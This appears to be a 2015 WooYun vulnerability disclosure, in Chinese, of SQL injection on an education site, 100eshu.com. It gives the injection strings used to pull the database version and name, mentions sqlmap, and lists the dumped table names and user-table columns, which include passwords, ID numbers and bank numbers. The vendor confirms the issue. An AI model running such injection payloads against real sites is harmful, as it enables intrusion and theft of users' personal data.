当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114299

漏洞标题:圣才学习网某处SQL注入导致管理员账号泄漏+20万用户数据泄漏(涉及手机号、邮箱、QQ号等敏感信息)

相关厂商:100eshu.com

漏洞作者: harbour_bin

提交时间:2015-05-18 00:32

修复时间:2015-07-02 00:54

公开时间:2015-07-02 00:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-18: 厂商已经确认,细节仅向厂商公开
2015-05-28: 细节向核心白帽子及相关领域专家公开
2015-06-07: 细节向普通白帽子公开
2015-06-17: 细节向实习白帽子公开
2015-07-02: 细节向公众公开

简要描述:

介绍:圣才学习网是圣才教育旗下官方学习网站。 网站旗下包含考研考博、英语、经济、证券、金融、保险、管理、外贸、财会、统计、精算师、心理、教育、法学、医学、新闻传播、编辑出版、工程、IT、国家职业资格、公务员、秘书、汉语、导游、学科竞赛等50个专业子网站。是这个新网站,感觉影响力还可以。
圣才学习网某处SQL注入导致管理员账号泄漏+20万用户数据泄漏

详细说明:

1、圣才学习网

JIEUT.png


2、漏洞地址(用户需要登陆)

漏洞.png


3、注入语句
2015051416054192' and '123'='123 有数据
2015051416054192' and '123'='12 无数据
2015051416054192' and 1=(select @@VERSION) and '123'='123 版本号
2015051416054192' and 1=db_name() and '123'='123 数据库信息
4、抓包信息

抓包.png


5、SqlMap中跑一下

语句.png


漏洞证明:

1、手动注入信息

数据库.png


2、版本信息

Banner.png


3、数据库

Database.png


4、用户名

User.png


5、管理员信息

管理员.png


管理员详情.png

未进行md5破解
6、用户表

Database: SCEbook
[146 tables]
+------------------------------------+
| AdminRight |
| AdminRole |
| AdminUser |
| Advertisement |
| Agent |
| AllMemberInfo |
| All_TJ |
| All_TJ_Download_Exam |
| All_TJ_Download_Exam_TK |
| All_TJ_Download_XXSub |
| All_TJ_TK |
| ApplePrice |
| BankList |
| BlackListIP |
| BookAgent |
| BookRelate |
| Config |
| ConfigCode |
| CorpInfo |
| Data |
| DataCategory |
| DataCheckReason |
| DataOperate |
| DataReport |
| DictionaryTable |
| DomainCategory |
| EBookArr |
| EBookConverting |
| EBookIdAndAgent |
| EBookIdAndAgentRenda |
| EBook_Media |
| Ebook |
| EbookActMember |
| EbookAdvertisement |
| EbookCategory |
| EbookCategoryFTP |
| EbookCategorySub |
| EbookCategorySub_Ebook |
| EbookCheckReason |
| EbookComment |
| EbookCommentReply |
| EbookDemo |
| EbookDraft |
| EbookEvaluateSetting |
| EbookExpire |
| EbookFeedBack |
| EbookFeedBackReply |
| EbookGroup |
| EbookGroupElement |
| EbookOperate |
| EbookPwd |
| EbookPwdGenerate |
| EbookRecommend |
| EbookRecommendDetail |
| EbookXueXi |
| Ebook_Apple |
| Ebook_Dangdang |
| EditorTool |
| EmailTemplate |
| Experience |
| FeeItem |
| FileInFolder |
| FolderCategory |
| FolderCategorySub |
| FolderCategorySub_Ebook |
| FolderCategory_TJ |
| Help |
| HelpCategory |
| IpAddress |
| Log |
| MaterialPackage |
| MaterialRegistrationCodeModel |
| Member |
| MemberAttr |
| MemberBankList |
| MemberBuy |
| MemberBuy_Stolen |
| MemberBuy_del |
| MemberClass |
| MemberClassRight |
| MemberFocus |
| MemberInstitute |
| MemberInvoice |
| MemberNetDisk |
| MemberOrder |
| MemberOrderPay |
| MemberRight |
| MemberRightItem |
| MemberRightItemCategory |
| MemberSearchTJ |
| Menu |
| Message |
| MobileAdvisement |
| MobileInstructImage |
| MobileInterfaceLimit |
| MoneyWater |
| News |
| PageSeo |
| PayConfiguration |
| PlatBookDownLoad |
| PlatBookDownLoading |
| PlatBookDownload_LastDay |
| PlatBookDownload_LastMonth |
| PlatBookDownload_LastYear |
| PlatBookPublish |
| PlatBookPublishAndPlatBookDownLoad |
| PlatBookPublish_EbookTK |
| PlatBookPublish_EbookTK_WithHezuo |
| PlatCross |
| PricePasswordTJ |
| QQOpenId |
| Question |
| QuestionReply |
| QuoteProduct |
| RegistrationAttr |
| RegistrationCodeBatch |
| RegistrationCodeBatch_bak |
| RegistrationCodeModel |
| RegistrationCodeModelBak |
| RegistrationCodeModel_del |
| ScNetDisk |
| Score |
| ScoreExchange |
| ScoreWater |
| TestCatTree |
| Tree |
| UserSearchTJ |
| VEbookAndApple |
| VEbookDownLoadCount |
| VRenda |
| V_FavorAndDownloadList |
| V_MemberBuyInfo |
| VarSize |
| View_1 |
| View_2 |
| View_EbookAndTb_E_QuestionPlan |
| View_MemberOrderForCenterU |
| Word |
| WordCategory |
| XXProductBuy |
| XXProductBuy_TJ |
| XXProductBuy_TJ_exam |
| book |
| tempT |
| v_AliveCodeEBook |
| v_AliveCodeTiKu |
+------------------------------------+
Database: SCEbook
Table: Member
[60 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| Address | varchar |
| AddTime | datetime |
| AllUserId | int |
| BankNo | varchar |
| CellPhone | varchar |
| CertificateApplyTime | datetime |
| CertificateType | int |
| City | varchar |
| Class | int |
| client_key | varchar |
| ContactMan | nchar |
| ContactQQ | nchar |
| ContactTel | nchar |
| CorpLogo | varchar |
| CostermerServiceQQ | nvarchar |
| CostermerServiceTel | nvarchar |
| DomainName | nvarchar |
| Education | varchar |
| Email | varchar |
| EndTime | datetime |
| Id | varchar |
| IdNo | varchar |
| IsAgency | int |
| IsCertificate | int |
| IsDefaultSign | int |
| IsForbidden | int |
| IsValidEmail | int |
| LoginCount | int |
| MemberAdmin | int |
| MemberLogo | nvarchar |
| Name | varchar |
| NickName | varchar |
| OauthType | int |
| OfficialWebSite1 | nvarchar |
| OfficialWebSite2 | nvarchar |
| OpenId | varchar |
| PayNo | varchar |
| Phone | varchar |
| Photo | varchar |
| PostCode | varchar |
| Publisher | nvarchar |
| Pwd | varchar |
| QQ | varchar |
| RealName | varchar |
| RecentLoginIp | varchar |
| RecentLoginProvince | varchar |
| RecentLoginTime | datetime |
| RegIp | varchar |
| RegProvince | varchar |
| SendKeyTime | datetime |
| Sex | varchar |
| SiteIntroduction | ntext |
| SiteName | nvarchar |
| SiteSign | ntext |
| StartTime | datetime |
| TenpayNo | varchar |
| ValidEmail | varchar |
| ValidEmailKey | varchar |
| Writer | varchar |
| WriterBrief | varchar |
+----------------------+----------+
Database: SCEbook
Table: AllMemberInfo
[73 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| Address | varchar |
| AddTime | datetime |
| BankNo | varchar |
| CellPhone | varchar |
| CertificateApplyTime | datetime |
| CertificateType | int |
| City | varchar |
| Class | int |
| client_key | varchar |
| ContactMan | nchar |
| ContactQQ | nchar |
| ContactTel | nchar |
| CorpLogo | varchar |
| CostermerServiceQQ | nvarchar |
| CostermerServiceTel | nvarchar |
| DomainName | nvarchar |
| Education | varchar |
| Email | varchar |
| EndTime | datetime |
| Expr1 | varchar |
| Expr2 | datetime |
| Ext1 | varchar |
| Ext10 | varchar |
| Ext2 | varchar |
| Ext3 | varchar |
| Ext4 | varchar |
| Ext5 | varchar |
| Ext6 | varchar |
| Ext7 | varchar |
| Ext8 | varchar |
| Ext9 | varchar |
| Id | varchar |
| IdNo | varchar |
| IsAgency | int |
| IsCertificate | int |
| IsCheck | bit |
| IsDefaultSign | int |
| IsForbidden | int |
| IsValidEmail | int |
| LicencePic | varchar |
| LoginCount | int |
| MemberAdmin | int |
| MemberLogo | nvarchar |
| Name | varchar |
| NickName | varchar |
| OauthType | int |
| OfficialWebSite1 | nvarchar |
| OfficialWebSite2 | nvarchar |
| OpenId | varchar |
| PayNo | varchar |
| Phone | varchar |
| Photo | varchar |
| PostCode | varchar |
| Publisher | nvarchar |
| Pwd | varchar |
| QQ | varchar |
| RealName | varchar |
| RecentLoginIp | varchar |
| RecentLoginProvince | varchar |
| RecentLoginTime | datetime |
| RegIp | varchar |
| RegProvince | varchar |
| SendKeyTime | datetime |
| Sex | varchar |
| SiteIntroduction | ntext |
| SiteName | nvarchar |
| SiteSign | ntext |
| StartTime | datetime |
| TenpayNo | varchar |
| ValidEmail | varchar |
| ValidEmailKey | varchar |
| Writer | varchar |
| WriterBrief | varchar |
+----------------------+----------+


7、20万数据证明

AllMemberInfo.png


点到为止,应该是比较严重的.

修复方案:

你们更专业!

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-18 00:53

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-15 17:31 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    你真的很有心啊,你是杭州的吧,坐地铁做多了?

  2. 2015-05-15 18:06 | harbour_bin ( 普通白帽子 | Rank:358 漏洞数:47 | 向TOP200进军!)

    @sql小神 额,啥意思?

  3. 2015-05-15 18:28 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    @harbour_bin 杭州地铁贴的都是这个广告,我还以为你是坐地铁看到的呢

  4. 2015-05-15 18:45 | harbour_bin ( 普通白帽子 | Rank:358 漏洞数:47 | 向TOP200进军!)

    @sql小神 哦,嘿嘿.前两天想下载个资料的,习惯性的试了试,然后就这样了